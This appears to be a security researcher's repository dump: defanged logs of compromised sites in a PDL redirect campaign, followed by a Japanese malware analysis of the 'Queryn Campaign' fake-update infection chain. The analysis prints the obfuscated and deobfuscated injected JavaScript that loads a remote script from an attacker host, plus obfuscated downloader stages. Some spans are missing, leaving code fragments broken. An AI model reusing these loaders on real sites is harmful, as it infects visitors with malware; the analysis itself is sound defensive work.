244 | |14|2017-03-22 06:52:06|www[.]gscpsdsd[.]in|
245 | |15|2017-03-22 06:52:38|www[.]analiticaweb[.]es|
246 |
247 | ##### 1 minute
248 | |no|access time|host|
249 | |:--|:--|:--|
250 | |1|2017-03-22 03:33:28|www[.]mediaservis[.]hr|
251 | |2|2017-03-22 03:34:33|www[.]atfalclub[.]com|
252 | |3|2017-03-22 03:35:35|www[.]sohofactory[.]pl|
253 | |4|2017-03-22 03:36:37|www[.]simply-vegan[.]org|
254 | |5|2017-03-22 03:37:38|www[.]lamarieeauxpiedsnus[.]com|
255 | |6|2017-03-22 03:38:42|www[.]gscpsdsd[.]in|
256 | |7|2017-03-22 03:39:43|www[.]analiticaweb[.]es|
257 | |8|2017-03-22 03:40:45|www[.]samethattune[.]com|
258 | |9|2017-03-22 03:41:49|www[.]selfprinting[.]es|
259 | |10|2017-03-22 03:43:00|www[.]cosmosbank[.]com|
260 | |11|2017-03-22 03:44:03|www[.]eurodiastasi[.]gr|
261 | |12|2017-03-22 03:45:08|www[.]traccs[.]net|
262 |
263 | ##### 5 minutes
264 | |no|access time|host|
265 | |:--|:--|:--|
266 | |1|2017-03-22 02:18:51|loadcraft[.]net|
267 | |2|2017-03-22 02:23:57|lapsid[.]sk|
268 | |3|2017-03-22 02:29:06|www[.]utilisersonmac[.]com|
269 | |4|2017-03-22 02:34:08|kedaipena[.]com|
270 | |5|2017-03-22 02:39:10|www[.]gwbicycles[.]com|
271 | |6|2017-03-22 02:44:14|www[.]poliglot-16[.]com|
272 | |7|2017-03-22 02:49:16|www[.]stanjamesaffiliates[.]com|
273 | |8|2017-03-22 02:54:29|www[.]sohofactory[.]pl|
274 | |9|2017-03-22 02:59:31|www[.]simply-vegan[.]org|
275 | |10|2017-03-22 03:04:32|www[.]lamarieeauxpiedsnus[.]com|
276 | |11|2017-03-22 03:09:36|www[.]gscpsdsd[.]in|
277 | |12|2017-03-22 03:14:37|www[.]analiticaweb[.]es|
278 | |13|2017-03-22 03:19:40|www[.]samethattune[.]com|
279 |
280 | ##### 10 minutes
281 | |no|access time|host|
282 | |:--|:--|:--|
283 | |1|2017-03-22 06:19:17|www[.]gwbicycles[.]com|
284 | |2|2017-03-22 06:29:20|www[.]poliglot-16[.]com|
285 | |3|2017-03-22 06:39:22|www[.]stanjamesaffiliates[.]com|
286 | |4|2017-03-22 06:49:30|www[.]atfalclub[.]com|
287 | |5|2017-03-22 06:59:32|www[.]sohofactory[.]pl|
288 | |6|2017-03-22 07:09:34|www[.]simply-vegan[.]org|
289 | |7|2017-03-22 07:19:35|www[.]lamarieeauxpiedsnus[.]com|
290 | |8|2017-03-22 07:29:39|www[.]gscpsdsd[.]in|
291 | |9|2017-03-22 07:39:41|www[.]analiticaweb[.]es|
292 | |10|2017-03-22 07:49:43|www[.]samethattune[.]com|
293 | |11|2017-03-22 07:59:47|www[.]selfprinting[.]es|
294 | |12|2017-03-22 08:09:53|www[.]chelagarto[.]com|
295 | |13|2017-03-22 08:19:56|www[.]cosmosbank[.]com|
296 | |14|2017-03-22 08:29:59|www[.]eurodiastasi[.]gr|
297 |
298 | ---
299 |
300 | ### Consideration
301 | I don't know whether the information of the accessing user exists in the central server or each server, but it has certain rules
302 | - User information is synchronized from each server every 1 minute
303 | - Transmission processing and synchronization processing are not performed instantaneously
304 | - There is a delicately time lag, but transmission and synchronization are done in around 0 seconds
305 | - About 10 times, if you access the Compromised site with the same IP, it will be blacklisted
306 | - There is an error depending on which compromised site you access
307 | - Whether or not the processing (user's information transmission/synchronization) processing (success/failure), timing and so on are different?
308 | - When entering the blacklist, even if you access the Compromised site you have never accessed, it returns the normal page
309 |
310 | ## Summary
311 | - PDL shares user information between each compromised site
312 | - About 10 times, if you access with the same IP it will go into the black list
313 | - When you enter the blacklist, even if you visit the Compromised site, the site returns a normal page.
314 |
--------------------------------------------------------------------------------
/2017/seccamp_2017_tutor_presentation.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koike/public/fca935fe35302d192e7544211704d50884a9ca24/2017/seccamp_2017_tutor_presentation.pdf
--------------------------------------------------------------------------------
/2017/seccamp_award_2017_en.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koike/public/fca935fe35302d192e7544211704d50884a9ca24/2017/seccamp_award_2017_en.pdf
--------------------------------------------------------------------------------
/2017/seccamp_award_2017_ja.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/koike/public/fca935fe35302d192e7544211704d50884a9ca24/2017/seccamp_award_2017_ja.pdf
--------------------------------------------------------------------------------
/2018/queryn.md:
--------------------------------------------------------------------------------
1 | # Deep Analysis of Queryn Campaign
2 | 私達は2018年初旬頃から、Webサイトを改ざんして悪性コンテンツを配信する攻撃キャンペーンを観測してきました。この攻撃キャンペーンは一般のWebサイトに数行のHTMLコードを書き足します。改ざんされたWebサイトへアクセスしたユーザは、書き足されたコードによって悪性コンテンツを読み込み、ソーシャルエンジニアリングによってマルウェアをダウンロード・実行してしまいます。私達はこの攻撃キャンペーンを、その特徴から"Queryn Campaign"と呼んで識別しています。
3 |
4 | 私達がこの攻撃キャンペーンについて全ての解析が終わった後、得られたIOCをもとに追加情報を検索したところ、FireEyeによって書かれた"[Fake Software Update Abuses NetSupport Remote Access Tool](https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html)"というレポートを発見しました。私達がQuerynと呼んでいる攻撃キャンペーンの後半のトラフィック(JSが降ってきてからの話)を扱っており、それらの情報はほぼ重複しています。FireEyeのレポートはこのレポートを書く1ヶ月ほど前のものなので、多少サーバの情報等は変化していますし、Compromisedサイトから攻撃サイトまでのトラフィックなどをあまり紹介しておらず、何より日本語の資料は存在しなかったためこのレポートを公開しますが、詳細な情報が欲しい場合はFireEyeのレポートを参照することをオススメします。
5 |
6 | ## Traffic Chain
7 | 
8 | ↑[EKFiddle](https://github.com/malwareinfosec/EKFiddle)による色付け結果
9 |
10 | Queryn Campaignによって発生する一連のトラフィックを紹介します。まずユーザは改ざんされたWebサイト(以下、Compromisedサイト)にアクセスします。Compromisedサイトには以下のようなHTMLコードが書き足されており、それによって `query.network` というサーバにある `jquery` をJavaScriptとして読み込みます。
11 |
12 | ```html
13 |
14 | ```
15 |
16 | `jquery` はHTTPのLocationヘッダによって `https[:]//boobahbaby.com/site/bundle.js` へリダイレクトします。
17 |
18 | `bundle.js` は多少難読化されたJavaScriptコードですが、挙動は明確です。 整形したコードを以下に示します。
19 |
20 | ```javascript
21 | (function () {
22 | var t = navigator[m(":t{n{e)g;A,r}e}s)u)")];
23 | var i = document[m("3e)ink{ojo9c{")];
24 | if (o(t, m("&s)w,otd;n;i)W,")) && !o(t, m("&d)i{o;r}d8n(At"))) {
25 | if (!o(i, m("m=}a7mpt(u,_{_z_{"))) {
26 | var v = document.createElement('script');
27 | v.type = 'text/javascript';
28 | v.async = true;
29 | v.src = m('8b7d96p5}f{e,f;5(el7{f)dh1)c;dxc(805h812r=xv7&}2{3{2)=cd(i,cm?)s;j,.merd0o{c(_(s)/,m(o8cx.,d;nfa,r}bhh}s9iym;a}.1k;c)a(r)ta/(/;:{s2p(t{t}h{');
30 | var s = document.getElementsByTagName('script')[0];
31 | s.parentNode.insertBefore(v, s);
32 | }
33 | }
34 |
35 | function m(h) {
36 | var a = '';
37 | for (var x = 0; x < h.length; x++) {
38 | if (x % 2 === 1) a += h[x];
39 | }
40 | a = w(a);
41 | return a;
42 | }
43 |
44 | function o(e, k) {
45 | return e[m(".f,Obxfevd;n6it")](k) !== -1;
46 | }
47 |
48 | function w(b) {
49 | var l = '';
50 | for (var g = b.length - 1; g >= 0; g--) {
51 | l += b[g];
52 | }
53 | return l;
54 | }
55 | })();
56 | ```
57 |
58 | 幾つかの文字列が `m(h)` というfunctionによってデコードされています。例えば `o(e, k)` で使われている `m(".f,Obxfevd;n6it")` は実際には `"indexOf"` であることが分かるでしょう。同様にコードを読み進めていくと、最終的に以下のようなコードになります。
59 |
60 | ```javascript
61 | (function () {
62 | var t = navigator["userAgent"];
63 | var i = document["cookie"];
64 | if (t.indexOf("Windows") !== -1 && t.indexOf("Android") === -1) {
65 | if (i.indexOf("___utma=") === -1) {
66 | var v = document.createElement('script');
67 | v.type = 'text/javascript';
68 | v.async = true;
69 | v.src = "https[:]//track.amishbrand.com/s_code.js?cid=232&v=2858cdc1df7e5fef56db";
70 | var s = document.getElementsByTagName('script')[0];
71 | s.parentNode.insertBefore(v, s);
72 | }
73 | }
74 | })();
75 | ```
76 |
77 | このコードでは、まずユーザのUserAgentの中に `Windows` という文字列が含まれているか、かつ `Android` という文字列が含まれていないかをチェックします。ユーザ環境がWindowsである場合、次にCookieに `___utma=` という文字列が含まれているかチェックします。含まれていない場合、 `https[:]//track.amishbrand.com/s_code.js?cid=232&v=2858cdc1df7e5fef56db` をJavaScriptとして読み込んでいます。
78 |
79 | `s_code.js` も難読化が施されていますが、基本的な原理は難しくありません。ここからさらに2回ほどリダイレクトが行われ、最終的には `https[:]//mean.nitrpindia.com/topic/news.php?b=232&d=de0a8b98d8734337496430884ef32b25&l=476827` というWebサイトをiframeで読み込みます。
80 |
81 | この `news.php` では以下のように表示され、偽のアップデードを促されます。IEでアクセスした場合はAdobe Flash Player、ChromeやFireFoxの場合はそれ自体のアップデートが促されます。指示に従ってインストールボタンをクリックすると、Dropbox経由でJavaScriptファイルがダウンロードされます。ブラウザによって表示されるコンテンツは変化しますが、ダウンロードされるJavaScriptファイル同一のものです。ユーザはこのJavaScriptファイルをローカル環境で実行することで、マルウェアに感染してしまいます。
82 |
83 | 
84 |
85 | 
86 |
87 | ## JavaScript Analysis
88 | ダウンロードしたJavaScriptファイルは数段階に渡って高度な難読化とAnti-Debugが施されています。それらを順番に突破しながら、コードを解析していきましょう。
89 |
90 | ### Obfuscation 1
91 | これから解析するコードの初期状態は以下のようなコードです。
92 |
93 | ```javascript
94 | (function(widyzimoz){var ifda=[];var vmoipwewad="pzaur0"["c"+"o"+["n","e","r","T","c","J"][(-9+9)]+"s"+["t","S"][0]+("Q","d","r")+["F","a","I","u","K"][parseInt(3,19)]+["c","r"][(82,13,48,96,0)]+["C","t","M"][(-169+170)]+"o"+"r"];function zvytpe(){var opinjol=1;for(;opinjol<=tokunabki[["g","l","U","G"][(86-85)]+"e"+("y","I","m","J","F","n")+"g"+"t"+"h"];opinjol++){ifda=(tokunabki["s"+"u"+("g","h","g","b")+["M","f","p","u","s","d"][(-628+632)]+"t"+["T","U","r","a"][(324-322)]](tokunabki[("j","L","C","g","h","l")+["e","I"][0]+("S","c","v","X","F","n")+["g","I"][(-953+953)]+("e","z","t")+("p","D","h")]-opinjol))[["i","s","C","m"][1]+("O","I","t","U","p")+"l"+("u","z","i")+"t"]('');for(var vuwkzoxfa=(10,93,0);vuwkzoxfa `fsobixohtxy` -> `utvubdo` という順番でcallされていきます。
156 |
157 | `utvubdo` functionでは `vmoipwewad` のコンストラクタに復号されたコードが渡されており、それを `dgylna["toString"]` に代入した後、実行しています。そのため、代入する直前には既にコードは完全に復号されており、そのときのデータを取得すれば良いでしょう。 `dgylna["toString"]();` などをコメントアウトし、代入処理の直前にconsole.logなどを足して、実行してみると、以下のようなコードを得ることができました。
158 |
159 | ```javascript
160 | function dec(input) {var japlhocha = "FZkHy8";var uctmashakmi = "K2T08Fseu";var giwbe = "LgEJpj";var fohuwhy = "hjhhgZT";var efovfucu = "lJfKHn0dP";var wcyerneka = "at9E3uY";var wcuapit = "B5ZiJ";var oqckocix = "GpAXc14LvO";var vivyw = "ecuge";var ukcyqhes = "oEurX";var gehpeqflu = "dy2mOU";var itjusax = "vrtTH0DAlW";var ircyndoki = "t9flFl";var hextnoagpu = "N4HpFuVg";var muboxcqe = "ISSGOsjsDh";var ysdxovo = "UtgHm";var yjqo = "gFQgzjw";var hulbo = "HB5kslT";var tylutej = "I0OA1ZeC2h";var johe = "PmBPlQr";var uzmabvpu = "sKdS1pMNH";var evud = "U1xM3WyR";var qewax = "NlJi7MeFES";var welys = "M8URV8";var xtauv = "ib1UkVL";var curdyctaqtu = "TF7ML4";var munvullof = "yv393z";var dkyfysuz = "yaX7C4vs3";var rehzyypdgy = "ccuDt";var ceqdosicgxu = "v8XWQeXL";var wagbamybqe = "z7HgjVgq";var vixtsu = "Wk1CAkyQ";var tizde = "af72SHn";var hbubocnu0 = "YFXhVZX";var qusvdu = "pLUXI";var suvdowy = "Y1PKQD9m";var ypbocos = "Q5x3tZ";var ddarny = "tqkcvR";var hyxe = "d4TqueD06T";var xnywpyru = "M0cXP9uK2m";var ybbwitemvxa = "yq7bO9";var wurme = "q7dMxlX";var kosuqasus1 = "xmEP3j";var sbohesqvien = "ZfCaYB6Bh";var bmiavag = "ceHGjIaJwr";var whetjy = "EwvTf";var udcehaste2 = "jqUlVp";var hkaiz = "AoGGO";var burvuxso = "wwZ9d2IGI";var ihtup = "XDE6RHOypl";var ozxqu2 = "rZ82OHsa";var pvutipolqod3 = "ZvJydJOP1";var lmicokpi = "coFDt56YU";var tezcpyohat = "GF2Cg6dd";var zyrgirut = "zfSTqo5";var olcji = "b7uhZ";var hxelhu3 = "cmm4u";var vikweun = "gYr0EmNozv";var nepja = "K75luSK4oc";var vandatgwa = "pgFjNUGRt";var fiwmedmowu = "JqxWze5QLx";var buzggebyb = "PcNy9pZmVc";var zuekcci = "hx0oRo";var gxularzodgo = "q8hjOPd";var xiib = "QlGXC0";var tiquz = "wPTebAbN";var evnpidu = "W0N7fy";var lvyke0 = "ppZjc6";var pukpatujlup = "BBtAHQ";var xgetavwyga = "GiXI6aCvSu";var pbabiutvo = "kGFxH9TSgy";var ejxetcu = "u9q0FUi";var huxby = "tzsw0scV";var azcagqiog = "tCVZcmAkv";var bpeiqculxe = "uOFQ9";var ewfu9 = "WnWjcB";var esosix = "k6Xhq";var nimocavnba = "pFrXJNqcp";var jontruzinom = "bkUF1Gl";var tiwu = "qtcEnRF4cq";var noluuf = "CX3wMqdGF";var penipex = "j03tvv5v";var epteruv = "X3nlAeJZF";var ojawbu = "rOJgQhvXy";var pzehul = "MIt0yKvwi1";var tycnibbeyp = "wlRRmNb7te";var jaucag = "uZFmzfm";var ycsidmsi = "ErevW5";var wudjpyqdi = "C6Oeeqlt";var ajhixid = "RwcW3";var qirwok = "OAXkqtwnw";var cwaok = "A8dPz";var wdafyup = "wGR9zJgBAr";var injhuyn = "bbH38PVj";var hiwykyxpi4 = "C1nW2fY";var sicyqlbuce = "iXa8zmV";var xyexvo = "F03sR9l7";var hybo = "CN2BgTLB";var bapqu = "IiyIUOBGpD";var kyqgonqy = "wbpiPO";var cjybut = "gXMy8bRY";var ikjaxe = "Hf9Xlv";var jugko = "zq77Gh5";var pamoquclo = "f9TDcPMv7r";var sycuhke = "eYZpINxT";var xamsavvilrug = "vley8";var pylfazecas = "aoMfILaPY";var ujotveor = "xRik8";var asfunecqa = "IqeLo";var kedanjiwuj = "DCBA8fQ";var jemkixoor = "yeOKI8jPk";var atpuz = "QSsyBAS";var lyqwina = "ri7dMCy";var xnuttuenin = "y3QeE";var qasojet2 = "bQuWD";var zilym = "hCTpDJTA";var adqdiij = "KwkF7HdT";var zibowxax = "JI9xU";var cxamupvuxif = "SL9AmQ";var icwhyom = "arpWYP5";var qsisiet = "Gy3xb";var zzyddi = "iBNremvLxa";var gryub = "STO5fjRN";var zlohabrami = "Vvs0wU";var juemgab = "zmrmSAUe";var pqiqpawed = "r06ohG";var jaxgziuscfu = "InjqA";var tegrdysymmo0 = "bJ1hqab";var jioblxu = "jHkaykjY";var jaxukilhpa = "PvHjC";var bywsykpxu = "EOStFYJSuG";var suqjgufvafa5 = "Uy0PRdDMej";var naddreniw = "MjdTqIY";var riez = "m0dyd7Y";var kviir = "m8vfm4s";var fwuew = "CZxGv";var ohmerhowy1 = "NKTpd";var paxqi = "CG2GrN";var jlojihax = "SDqbnKD1xY";var liif = "uSCMCgN";var eqcjo = "N4dDHZfXMp";var azfjo = "vKy7JO";var nehsgy = "CoOX9n4Tb";var zuswkapda5 = "EXdh1aaKL";var zheympaquw = "zapjdhhhH";var iratuhfa = "fZ3TDNlXd";var andigagnno = "EVaql";var ymysymdi = "iis3Rn2";var pahmwy = "yTVLmZCJ";var iptuzrqy = "ctq44ltlD";var ubfukalvi1 = "gqQvj9N";var ziijip = "tWdMs1n19";var orubfof3 = "mSIgP";var mylynjut = "Qc3NEIDZn7";var vybox = "qbiYUV";var acysmah = "aljGp";var lyzsra = "d4fK5B3L0P";var vlitela = "OPBHrp5";var texge = "Cqzn2gOsmC";var cxykhi7 = "bjLi8";var gocogos = "PDdeLlUIzv";var wcocsukywuq9 = "TsZlw";var idmobpu = "vnjSDPjJh";var ryrreqi = "QKHGqFKQ";var axyq = "Si7zZyeJpt";var migef = "XYUVw8F";var xonaykfuv = "WrQ3ef";var ecte6 = "mPxGG";var qyil = "vDF0Su";var efnywqaun = "z7Po0F";var hiesuc = "BBVSzhX";var pekofocev = "EyEhyzs";var irna = "ELG8pYG";var asvfohuw = "CzrnF";var unva = "euWL2vdpa";var ncawerugrpu = "vwNLBXVMb";var hxysa = "GPXorVje7t";var riuscacruf = "NW90X";var tkeoh = "xfE20B";var odnvuecbi = "SaDxq9lcTY";var andbi = "kYwC7";var awqov = "jG0aSZ";var soiqlxu = "blfaNFpaH";var rxyguq = "NJOWw";var miyvubsi5 = "di8L4Wgto";var telcawagras = "lIh97KjCKw";var ohol = "QGDWqWybt";var pgakxuti = "VraEgJTg";var ugsnaivuq = "qLKPSs";var mkigozo = "duZNis9";var riewoqwy = "CdN4o";var ucjyj = "nHTvf6ij";var zynltaji = "f412CCuV9";var altqu = "LPRLrtfnD";var rebdeva = "DyyIYr2O";var sqema = "sJAUsylvm";var zipaubqeb = "Lmegtq";var odlwa = "vLv88KoCap";var ffubeedlti = "MlBNB";var dbilbaigis = "qEABE2DEV7";var cejbykemwsi = "cQh8a2";var rdepa2 = "hZgZgp";var acydloly = "jdOwnK";var bsyrmakyl = "Rj0EA";var xmoda1 = "GMKs6L6";var ruwtazyvno = "oJXknO";var oblzizozxo = "UgA3lZ2P";var hutdsyvga = "HU8nF0M";var igah = "PJ6HS";var piqwzanosev = "bR4cvV9";var ryvah = "vgwilJNh";var rydtolowew = "IymScA0";var ocniperer = "KkQ3U9";var umxbi = "mkdWE40zdo";var xagoktwilow = "b9Tyv9";var hatignoew = "i7KB8";var rjaiqtu = "yq93v";var opzfedox = "Jkymm7WiA";var jiwyvpxi = "boelgsQ";var rvaoh1 = "dkziGPL";var epbasufmut = "rjwu340yI";var ngemjisofaf6 = "W0P1uao";var mufdomebaf = "wumqHyyfm";var tbyghesumhe = "gx57Zk";var leduux = "sDsFWUIX4R";var bxeutax = "VaJslJoy";var pyjucfej = "scjQl2";var fasmo = "ndyDpR";var yxcylux = "yj9vI";var ufezti5 = "GWcIjk";var acfo = "A7x83KQn5";var xictgagas = "vGyOMSvf";var nijiwqi = "PN6Ce5fT7E";var iqtugyd = "a4pgI";var foezze = "HMooTN1D";var byde = "a20orTbtx";var girvuvu = "y8m9je";var fmaud = "PorgxOqQ23";var wakcxo = "qWaQL";var mbyab = "KQXBaUL0F";var ibwitoh = "HrrepWOkgL";var zokjlujty = "A8X1wVeyA1";var zmoqywyfoj = "FEvpH9a";var arqagfostje = "InvMCG";var ndeos = "b3hGqN";var suhohyknam = "m4th4";var trujfi5 = "fC7kHACLTB";var bnexibef = "MHQr4SYlE";var sxofufgyqa = "WYhC8n6k";var beejta = "e27gZII";var eqasciem = "xihCNQd";var deykxuwu = "LNcaEby9v";var nyamciwym = "Z5bCmk02G6";var zexqeum = "qFdwAp4H";var ybbuf = "crcgYMG3";var wypxofohol = "Ra87dcT4o";var foznsayrni = "IwSOHn";var kfira = "ZaiEGbsn";var asdbaga = "rYjnLdL";var xceag6 = "tMzG9kUU";var bilja9 = "wCv6M";var tcujmapeh6 = "a7igRnWR";var agfevojux = "ilDucuP";var rekamobyw = "NP6IE";var jihvipgug6 = "uQ2GcaZMw8";var kgirydzij = "zjjcU";var enek5 = "Fm96GtjA";var nzyjas = "JrXPyDiRdt";var evepew = "k8YHuB2L";var wezejy = "PTTz3E54R2";var epsa = "s1OpFTtx";var legosdru = "LUoZ8";var lyhhi = "xWQqFL";var davwugap = "KsDIj";var ivihuh = "cRKgTjHCIR";var amzih3 = "sSgFzTn";var ipfu = "c6rUn6ugu";var xeqozkyh = "uHqAlN";var qkajba = "wlvO2Vp";var aqosryez = "xbD8PW";var tajjmexyved = "ePdbmxDAlT";var ogsmyrohdu = "tnuBVb5Q";var jrativsa = "Sk9vSsaW";var abksy = "PN6WiZptWK";var xafelojpo = "S5e8w7m";var ibyr = "HA8JOhgWD0";var agmopwseto9 = "QGCnKPetCc";var vijve = "h3oUSCnvPi";var rerpeadyz8 = "PWAT0L";var karid = "E69n2Jg2v";var heqqemjakyb = "LtqG12jl";var zoawmuby = "ufUO3CK1";var zsahuncekak = "UzME6XvZ";var ggapfoim = "SfSfo6upYN";var bioz1 = "NvARZ0QN0d";var ttyhyxy = "AvgeD";var pdyfdu = "gYCmu7";var siqce = "Lf0QdCcI";var inqinradfi = "CjE1PNpVm";var hzidurofi = "RXgd0qkjB0";var xizju = "q51jvmD";var cyqmalpzepy = "BdBFCZrZI2";var dybdawo9 = "f9P6g5";var ecgutic = "CjDojq4OS";var exllook = "Z5WWLPb";var bodxyxor = "j3tOcBRK9";var dodbyspwa = "EiRdrPfC";var esahxtiza = "i4O136";var bhuxjy = "yMTCQI";var rymyv = "T3pkQjXG1";var ppeyd = "o6GBW0";var popucad = "gTS0Pu";var mrolij = "DccH54IV";var ehjtuan = "rrLLpCG";var cmomukwli = "VKDc0H";var roumfmu = "bCQOUnmz";var megiso = "yGOYF4U9f7";var pysycfeof = "Z9QF2xMZGy";var vorub = "oE2kb";var ykpy = "Kg24x";var xetpolpak = "CVGKG049";var amecexub = "yNek0wPTS4";var dytsyqmu = "xhVl3aUaHB";var helajpju9 = "z2bU1uxw2";var jduir = "B2Er48Z";var whoziqbi = "NykKMe1kd";var nijende = "grDBL";var ivvijcry = "gIn1N";var ezchi = "r8C9gkx";var gdeso = "vLtxo";var dyfxpe = "waQAzB370";var jseymmo = "AGi5KCPZCX";var cuqsakac = "BLDcpKk";var cylscy = "Ltmu6yURTh";var fjuih = "FbWIKRAD8";var nahyk = "WonE8";var uknhiricot = "FxxDI3";var mnyiq = "VnNwVla";var kdacca = "inJyagtv";var yner = "mEOYc";var zemfypfu = "TiuFI";var isxuse = "rtpX89oJ";var mevonavoj = "t8cVG4";var hetvise = "l0f2x65";var sogtyvliroq = "ClD0Cd";var czijofdziju = "nmvRvsZg4";var hiig = "wSQho";var paqyb = "VnPfOI5";var vkocgo = "wUIOKXCs3I";var gafaw = "ht9TqL";var xogxbumcu = "CAR7P0";var wlootpgi = "XitX4mnGa";var uqhyc = "hQ96VwuCHl";var ysnyciwbi6 = "mDiSHy";var fyeratmxa = "mNBqg0wBp4";var siqwore = "MLLhI";var amdam = "U6WVQIG";var diqgoupvil = "iJbVfO8RJ";var jepfi = "BKgrZ5z";var eznuwqof = "r0TFhwAOQC";var xicicet = "FVoCCXWXZ";var ezokucsut5 = "MPYIXOamf";var wenpycyxiv = "PFSIms0DC";var hxetibbnocyz = "aDhlF";var nniokusgur = "pz19y";var kaoxux = "mYGgiJV";var zuiqfuvat = "tSuFEWUJd";var hfoqyr = "oO6Wt3Rc";var humbny = "gcMe9";var gexda = "hwT7E6T";var wevzo = "aB6wv";var getezepuj = "udM429M1";var gevex = "AkIipLrc";var vsexe = "ZWpHePtG1g";var wuvtdu = "e8skX";var xayn = "fS7RXf";var jerar = "vs7wkfniuH";var qdoymnek = "XRBmq";var gisu = "mn3Yk";var tajsniahcri = "RMwMzei1";var udygak = "vK62pcxW";var bvaug4 = "bdA3DMBz";var wgagunvbavlo = "Zf0OL7";var tyxlyow = "uHuT0LQ9R";var ykzi = "zFCoFo";var ebowom = "Q9AVypJ";var xgilyje = "n1sMI";var mybibez = "e2X331o";var ewtwuhhepa = "D1BZloR";var fasuhajcjo = "cYDJe1D";var redeg = "RjkOX33YHj";var zduanfezif = "svDH0bqLAr";var qxiqy = "URHT3";var opceetpwy7 = "UPuZ9Atgl";var cdadxyfgoow = "QIxRJD";var iqnja = "TqhG9Ox";var enronjem = "gTy3LhoTH";var midxiic = "sTy0n3pWh";var ajdiocag = "ZERplp9Zpe";var pykpar1 = "T8vhhuG";var xsubecspoem = "GslOw2K";var jezzqocypy = "mzMDdMf";var txeoxzpeat = "sE0Jtb";var jigthoemci = "Ws7km";var ytyvjeyn = "tZ7Ipk";var hjesu = "kvpAvw";var ybat = "qOmwjL6";var isixmu = "K7l8GYB";var vhusayr = "sGXZEMfmA";var zifamni = "tQ2OP4p";;/*mjzfsodFA7xngKSnX0hp*/;var thisFunctionText = arguments.callee.toString();var callerFunctionText = arguments.callee.caller.caller.toString();var key = [198, 95, 56, 156, 192, 135, 62, 141, 184, 238]; var i;try {callerFunctionText += navigator.appCodeName;callerFunctionText += 'callerFunctionText';}catch(e) {}key = encKey(key, callerFunctionText);key = encKey(key, thisFunctionText);var enc_str = [];for (i = 0; i < input.length; i += 2) {enc_str.push(parseInt(input.substr(i, 2), 16));};var tmpKey = [];var tmpKeyLength = 1;while(tmpKeyLength <= key.length) {tmpKey = key.slice(key.length - tmpKeyLength);for (i = 0; i 35?String[_0x5b87[5]](_0xf1fcx3+ 29):_0xf1fcx3.toString(36))};if(!_0x5b87[4][_0x5b87[6]](/^/,String)){while(_0xf1fcx3--){_0xf1fcx6[_0xf1fcx5(_0xf1fcx3)]= _0xf1fcx4[_0xf1fcx3]|| _0xf1fcx5(_0xf1fcx3)};_0xf1fcx4= [function(_0xf1fcx5){return _0xf1fcx6[_0xf1fcx5]}];_0xf1fcx5= function(){return _0x5b87[7]};_0xf1fcx3= 1};while(_0xf1fcx3--){if(_0xf1fcx4[_0xf1fcx3]){_0xf1fcx1= _0xf1fcx1[_0x5b87[6]]( new RegExp(_0x5b87[8]+ _0xf1fcx5(_0xf1fcx3)+ _0x5b87[8],_0x5b87[9]),_0xf1fcx4[_0xf1fcx3])}};return _0xf1fcx1}(_0x5b87[0],62,352,_0x5b87[3][_0x5b87[2]](_0x5b87[1]),0,{}))
758 | ```
759 |
760 | これを整形すると以下のようになります。
761 |
762 | ```javascript
763 | var _0x5b87 = ["v 13=\'2M(2N(\"2O%20%p%2L%a%3%1%8%33%10%M%B%j%4%Z%2K%2H%s%0%p%2I%2J%2%r%7%2P%2Q%3%3B%l%1e%2W%7%k%1f%2X%A%2V%2U%1%6%h%16%2R%4%H%2S%2T%A%2G%2D%1%b%j%l%1b%o%2q%2r%4%y%2s%2p%A%2o%1%b%G%5%F%F%1%I%2l%2m%2n%22%3B%e%2t%2u%0%r%2A%2B%a%2z%2y%5%6%h%2v%2w%0%y%2x%2Y%2Z%B%i%3s%0%3t%20%r%3D%3u%B%0%p%e%3r%3q%a%V%5%3n%d%3o%1%n%0%5%3p%3v%11%2%3w%0%3E%3F%2%3C%3A%7%3x%3y%17%3z%2k%s%3l%m%38%1l%2F%1q%39%3a%3b%Q%T%q%t%19%9%K%J%10%37%36%32%34%35%3c%3d%3j%3k%3i%z%8%z%1%3h%d%3%18%6%h%1%c%0%5%22%c%0%3e%f%c%0%w%29%j%4%15%C%3f%e%1j%3g%2%k%3G%1v%A%22%W%1w%3%6%2%d%2%5%F%1B%5%0%d%4%5%1D%1H%3%i%e%1C%1E%20%y%12%1F%a%1A%1G%1%s%h%1I%1x%4%3D%1z%1y%2j%6%u%27%0%2a%7%k%H%26%b%0%25%o%1n%23%a%V%5%24%G%2b%22%c%0%3%2c%2h%11%4%2i%4%2g%2f%20%2d%2e%0%21%1Z%17%1J%1P%29%1Q%m%1O%1l%D%1q%39%1N%K%1K%Y%q%2E%S%30%2E%19%M%R%O%1L%1M%1R%1S%1X%D%1Y%1W%z%8%z%1%1V%G%1%E%b%i%1%8%0%3%1%n%2%1s%3%8%20%x%b%j%C%1T%1U%1o%L%1g%9%9%9%s%j%2%Z%e%1m%C%3m%40%7%k%54%55%a%f%W%53%1%b%0%G%20%f%1a%F%22%0%P%0%52%50%1%h%o%1e%51%7%r%1f%56%m%57%5c%3%6%j%5d%5b%20%r%5a%58%59%6%h%4Z%0%4Y%0%H%3D%4O%s%4%p%o%4P%4N%m%4M%3%4K%P%4L%22%8%20%1%4Q%4R%4W%20%4X%2%5f%4U%2%3H%4S%2%4T%5e%5l%5A%14%29%5B%m%5z%5y%D%2F%5w%5x%5D%5C%Y%q%t%J%x%K%5F%M%5E%5u%5k%5v%5j%5i%5g%5h%5m%E%c%18%5%5n%d%f%E%6%u%f%n%4%1%22%8%4%5s%1%n%0%9%6%u%o%5t%5r%28%L%9%x%9%w%B%i%20%15%C%1m%e%1j%5q%0%k%5o%5p%1o%f%4V%4I%22%b%0%I%2%22%1a%42%1%0%I%2%43%41%5%3B%l%4J%3Y%7%k%12%3Z%a%44%45%1%b%i%16%4a%0%y%4b%49%48%b%3B%46%2%47%7%3D%3D%3X%29%4%p%e%3W%3M%a%3N%1%3L%d%3K%5%2C%2%1%3I%3J%3O%2%3P%0%3U%3V%0%3T%3S%4%3Q%3R%4c%4d%14%6%4y%a%4z%4x%D%4w%39%31%t%Q%T%q%t%S%9%t%J%L%R%O%4u%4v%4A%4B%4G%4H%4F%1p%c%1p%3%4E%d%f%E%6%u%3%8%2%1%3%8%2%1s%22%1k%20%w%6%u%l%4C%4D%a%q%x%1g%9%w%29%i%0%4t%l%1b%l%1n%4s%4i%8%4%3%1%c%0%3%1%1k%7%4j%1%n%7%9%29%3B%0%4h\"));\';v